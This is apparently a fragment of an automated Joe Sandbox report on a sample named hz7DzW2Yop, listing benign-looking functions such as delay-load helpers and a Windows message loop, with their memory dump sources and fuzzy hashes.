                                                                                                  • Instruction Fuzzy Hash: AAD0A93030120CBADF026B228C02AEE7AA9EB40380F008021BC42C51A1EAB1DD90A262
                                                                                                  Function 0091E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • DloadProtectSection.DELAYIMP ref: 0091E5E3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DloadProtectSection
                                                                                                  • String ID:
                                                                                                  • API String ID: 2203082970-0
                                                                                                  • Opcode ID: 3bbc6c126252ef50adea2c8ea94760d78220829794f8a7e3e741d95103fa2e80
                                                                                                  • Instruction ID: 0c49d3a98c00e44b909af481a3882d1e4a616c4e7d92ae3f82b4a9ed9218fe1b
                                                                                                  • Opcode Fuzzy Hash: 3bbc6c126252ef50adea2c8ea94760d78220829794f8a7e3e741d95103fa2e80
                                                                                                  • Instruction Fuzzy Hash: D2D012B03D42489BDB02EBA89946FDC77AAB368748FD80545F985D1491DBBC84C0FA05
                                                                                                  Function 0091DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00911B3E), ref: 0091DD92
                                                                                                    • Part of subcall function 0091B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0091B579
                                                                                                    • Part of subcall function 0091B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0091B58A
                                                                                                    • Part of subcall function 0091B568: IsDialogMessageW.USER32(00010464,?), ref: 0091B59E
                                                                                                    • Part of subcall function 0091B568: TranslateMessage.USER32(?), ref: 0091B5AC
                                                                                                    • Part of subcall function 0091B568: DispatchMessageW.USER32(?), ref: 0091B5B6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                  • String ID:
                                                                                                  • API String ID: 897784432-0
                                                                                                  • Opcode ID: bc54b8807a1a99aac7147bc68ca98abf4f603f502f87d90056dd3ca9b3b26ab9
                                                                                                  • Instruction ID: a2df4de66e2ae550347892fd36751ac3f406ea5ed8c7defb30104e868f619fc1
                                                                                                  • Opcode Fuzzy Hash: bc54b8807a1a99aac7147bc68ca98abf4f603f502f87d90056dd3ca9b3b26ab9
                                                                                                  • Instruction Fuzzy Hash: 7BD09E71258300BAD6012B51CE06F0F7AA3ABC9B04F404954B384740F18AB29D61EB11
                                                                                                  Function 009098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileType.KERNELBASE(000000FF,009097BE), ref: 009098C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3081899298-0
                                                                                                  • Opcode ID: 84c27b7c1f5c3a903c8e2592337ee939d8709b96307ad8b05425ae354e704464
                                                                                                  • Instruction ID: 1a9ba91545fa438f6f3efb8303973eef4d3e4f607184118e3ba80e905cded35f
                                                                                                  • Opcode Fuzzy Hash: 84c27b7c1f5c3a903c8e2592337ee939d8709b96307ad8b05425ae354e704464
                                                                                                  • Instruction Fuzzy Hash: 4AC002745042059ECE259A2498490997726AB533B67B4D694D469892E2C332CC97EA11
                                                                                                  Function 0091E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 74f42286a99e15789307dfe3db42c5155d15774dd62a2021d1797e01ccd18b9f
                                                                                                  • Instruction ID: bfc83f53af5226dae21513b2a4ad5de023be5f56fede3d264455cd04fd86a283
                                                                                                  • Opcode Fuzzy Hash: 74f42286a99e15789307dfe3db42c5155d15774dd62a2021d1797e01ccd18b9f
                                                                                                  • Instruction Fuzzy Hash: 4DB012D575C204BC310411551D06CB7011CD4C3B10330C83EFC02D0480D840AC811831
                                                                                                  Function 0091E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 34e06189c98d19a89fd1759ac3849398647fcec6f273438d69544131b7304f50
                                                                                                  • Instruction ID: 892fd8f65a74adc0008881e6c224cf3dd106260ab300b614b768c7a1e6b2434f
                                                                                                  • Opcode Fuzzy Hash: 34e06189c98d19a89fd1759ac3849398647fcec6f273438d69544131b7304f50
                                                                                                  • Instruction Fuzzy Hash: 78B012D175C104BC310456151C06DB7015CD4C2B20330C43EFC06C0580D840AC851931
                                                                                                  Function 0091E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 1aae3d0339a4de0ac48fe1833116a91ae20ba293532888ea10c3531e72646716
                                                                                                  • Instruction ID: ea5a67446531713f22f33bc9ee27f9476431fb7b3a80d3c303cf26b5d1003616
                                                                                                  • Opcode Fuzzy Hash: 1aae3d0339a4de0ac48fe1833116a91ae20ba293532888ea10c3531e72646716
                                                                                                  • Instruction Fuzzy Hash: 5AB012D535C208BC310451591D06DB7015CE4C2B10330C43EFC06C0080D8406C811A31
                                                                                                  Function 0091E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 42348bea281b6aea5d75a2da226fd9881d196f3191b0169d4fcd31b6f98817da
                                                                                                  • Instruction ID: 5bb7d0d91e0e2b54aad7db03c8545d90fc4ad696d3364dd8b9e5975ee0c27d02
                                                                                                  • Opcode Fuzzy Hash: 42348bea281b6aea5d75a2da226fd9881d196f3191b0169d4fcd31b6f98817da
                                                                                                  • Instruction Fuzzy Hash: 85B012E135C104BC310451161D06DB701DCD4C1B14730843EFC06C0080DC406DC22931
                                                                                                  Function 0091E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 1b61b2e2f5cc790249d4e5e240053da77d53fae858d5f5392407d40bd3c328b1
                                                                                                  • Instruction ID: b6f1a18abf08bc1d6ed267c6ba1db0fea48aec312fc315b4b1c9fb87d9bbfdeb
                                                                                                  • Opcode Fuzzy Hash: 1b61b2e2f5cc790249d4e5e240053da77d53fae858d5f5392407d40bd3c328b1
                                                                                                  • Instruction Fuzzy Hash: 13B012E175C104BC310451151C06DB7015CD4C3F10330C43EFC06C0081D840AD851931
                                                                                                  Function 0091E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: b660634ae002de9d89eacaa6d0382017d4b991ff129895f526de078fe4b153b2
                                                                                                  • Instruction ID: 32c1c6f04feee47a1c82757e0ed054522e226035f21b92d5d965584c51002e0a
                                                                                                  • Opcode Fuzzy Hash: b660634ae002de9d89eacaa6d0382017d4b991ff129895f526de078fe4b153b2
                                                                                                  • Instruction Fuzzy Hash: 69B012D136C244BD314452151C06DB7015CD4C1B20330C53EFC06C0580D8406CC51931
                                                                                                  Function 0091E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 6bb4ac769f6369893aaf87ff57faffb52c499f1dcd287d0c367804a8404460d7
                                                                                                  • Instruction ID: 91fbb2a420dff3acad31e5670147fbaab75b94722ff0acf8a7f04567d83925e3
                                                                                                  • Opcode Fuzzy Hash: 6bb4ac769f6369893aaf87ff57faffb52c499f1dcd287d0c367804a8404460d7
                                                                                                  • Instruction Fuzzy Hash: 02B012D135C104BC310452151D06DB7015CD4C1B20330C43EFC06C0580DC506D8A1931
                                                                                                  Function 0091E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: dac6cf6cd0271f911b01f485a79cf836a08053a1e903233ef0eda927692a1b02
                                                                                                  • Instruction ID: cc359d4a00ebfe90b8e01b3843f9f130cb6279cbce6af08b4be3e3372a873431
                                                                                                  • Opcode Fuzzy Hash: dac6cf6cd0271f911b01f485a79cf836a08053a1e903233ef0eda927692a1b02
                                                                                                  • Instruction Fuzzy Hash: CEB012E135C104BC310455151D06DB7015CD4C2F10330843EFC06C0081DC406E821931
                                                                                                  Function 0091E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 56fde4a16fde36535682aca08bd7d91030579568b176a142206d346ed4ee5c0c
                                                                                                  • Instruction ID: ecc48fb884b7e0931c66ecba1d6f02a0b346273760eb9180ee0d40cce24ff8fd
                                                                                                  • Opcode Fuzzy Hash: 56fde4a16fde36535682aca08bd7d91030579568b176a142206d346ed4ee5c0c
                                                                                                  • Instruction Fuzzy Hash: B1B012E135C104BC310451161C06DB7015CE4C2F10330843EFC06C0081D8406D811931
                                                                                                  Function 0091E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: e635243d8bf58c1d6d92bde90acf660a48fb9bdc6800d3cc5dc9f560878dd02f
                                                                                                  • Instruction ID: 6f3074aef4219cbc306677c7a0cca7d998ec61aeffa54dffde86489854c4e544
                                                                                                  • Opcode Fuzzy Hash: e635243d8bf58c1d6d92bde90acf660a48fb9bdc6800d3cc5dc9f560878dd02f
                                                                                                  • Instruction Fuzzy Hash: B7B012E135C204BD314451151C06DB7015CD4C2F10330853EFC06C0081D8406DC11971
                                                                                                  Function 0091E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E1E3
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 136f52fce0fc1e5ecf48ace46e91b6955eb3144da21c4cbc6a4a2b15c09fd8de
                                                                                                  • Instruction ID: 9e6fd5c4753164ee485f9683a2830b54d9e1be4ee93c7f2f44c5cf84f223cade
                                                                                                  • Opcode Fuzzy Hash: 136f52fce0fc1e5ecf48ace46e91b6955eb3144da21c4cbc6a4a2b15c09fd8de
                                                                                                  • Instruction Fuzzy Hash: 8CB012E135D244BD314452151C06DB7015DD6C1B10730853EFC06C0080D8406CC51931
